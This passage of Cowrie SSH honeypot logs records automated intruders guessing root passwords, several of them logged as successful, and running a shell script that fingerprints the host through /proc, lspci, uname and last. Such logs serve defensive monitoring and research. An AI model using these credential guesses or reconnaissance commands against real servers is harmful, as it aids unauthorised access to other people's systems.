'{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.864855Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.865891Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.867034Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.868350Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.869278Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.870099Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.871492Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.872202Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.872844Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.873430Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.874138Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:53:42.874998Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:53:44.456695Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:44.458016Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.session.closed","duration":"13.0","message":"Connection lost after 13.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:44.459897Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":33776,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa60e369cf9b","protocol":"ssh","message":"New connection: 185.93.89.7:33776 (1.2.3.4:22) [session: aa60e369cf9b]","sensor":"my-vps","timestamp":"2025-08-28T08:53:49.124034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:49.152067Z","src_ip":"185.93.89.7","session":"aa60e369cf9b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:53:49.152718Z","src_ip":"185.93.89.7","session":"aa60e369cf9b"}
{"eventid":"cowrie.login.success","username":"root","password":"index2024!","message":"login attempt [root/index2024!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:53:49.270967Z","src_ip":"185.93.89.7","session":"aa60e369cf9b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:49.296757Z","src_ip":"185.93.89.7","session":"aa60e369cf9b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33412,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cd2913e11f3","protocol":"ssh","message":"New connection: 51.79.164.132:33412 (1.2.3.4:22) [session: 2cd2913e11f3]","sensor":"my-vps","timestamp":"2025-08-28T08:53:53.009252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:53.148035Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:53:53.838847Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:53:55.017925Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:53:55.822909Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:53:55.823791Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:56.447668Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:56.449113Z","src_ip":"51.79.164.132","session":"2cd2913e11f3"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":32792,"dst_ip":"1.2.3.4","dst_port":22,"session":"d34e1a144511","protocol":"ssh","message":"New connection: 185.93.89.7:32792 (1.2.3.4:22) [session: d34e1a144511]","sensor":"my-vps","timestamp":"2025-08-28T08:53:58.445608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:58.446234Z","src_ip":"185.93.89.7","session":"d34e1a144511"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:53:58.464530Z","src_ip":"185.93.89.7","session":"d34e1a144511"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:58.466416Z","src_ip":"212.227.125.160","session":"107236b631d4"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2024!","message":"login attempt [root/Index2024!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:53:58.503797Z","src_ip":"185.93.89.7","session":"d34e1a144511"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:58.522096Z","src_ip":"185.93.89.7","session":"d34e1a144511"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35832,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ae29db67dcf","protocol":"ssh","message":"New connection: 51.79.164.132:35832 (1.2.3.4:22) [session: 6ae29db67dcf]","sensor":"my-vps","timestamp":"2025-08-28T08:54:19.991094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:54:20.091672Z","src_ip":"51.79.164.132","session":"6ae29db67dcf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:54:20.578849Z","src_ip":"51.79.164.132","session":"6ae29db67dcf"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:54:21.712605Z","src_ip":"51.79.164.132","session":"6ae29db67dcf"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:54:23.505415Z","src_ip":"51.79.164.132","session":"6ae29db67dcf"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35726,"dst_ip":"1.2.3.4","dst_port":22,"session":"631fd969831f","protocol":"ssh","message":"New connection: 185.93.89.7:35726 (1.2.3.4:22) [session: 631fd969831f]","sensor":"my-vps","timestamp":"2025-08-28T08:54:34.052487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:54:34.053442Z","src_ip":"185.93.89.7","session":"631fd969831f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:54:34.070728Z","src_ip":"185.93.89.7","session":"631fd969831f"}
{"eventid":"cowrie.login.success","username":"root","password":"index2024@","message":"login attempt [root/index2024@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:54:34.123895Z","src_ip":"185.93.89.7","session":"631fd969831f"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:54:34.142733Z","src_ip":"185.93.89.7","session":"631fd969831f"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49680,"dst_ip":"1.2.3.4","dst_port":22,"session":"beebd38fd771","protocol":"ssh","message":"New connection: 185.93.89.7:49680 (1.2.3.4:22) [session: beebd38fd771]","sensor":"my-vps","timestamp":"2025-08-28T08:54:43.449745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:54:43.505288Z","src_ip":"185.93.89.7","session":"beebd38fd771"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:54:43.505997Z","src_ip":"185.93.89.7","session":"beebd38fd771"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2024@","message":"login attempt [root/Index2024@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:54:43.592713Z","src_ip":"185.93.89.7","session":"beebd38fd771"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:54:43.624403Z","src_ip":"185.93.89.7","session":"beebd38fd771"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56886,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cc9a42d3ba1","protocol":"ssh","message":"New connection: 51.79.164.132:56886 (1.2.3.4:22) [session: 5cc9a42d3ba1]","sensor":"my-vps","timestamp":"2025-08-28T08:54:46.262705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:54:46.379086Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:54:46.894739Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:54:48.303568Z","src_ip":"51.79.164.132","session":"5cc9a42d3ba1"}
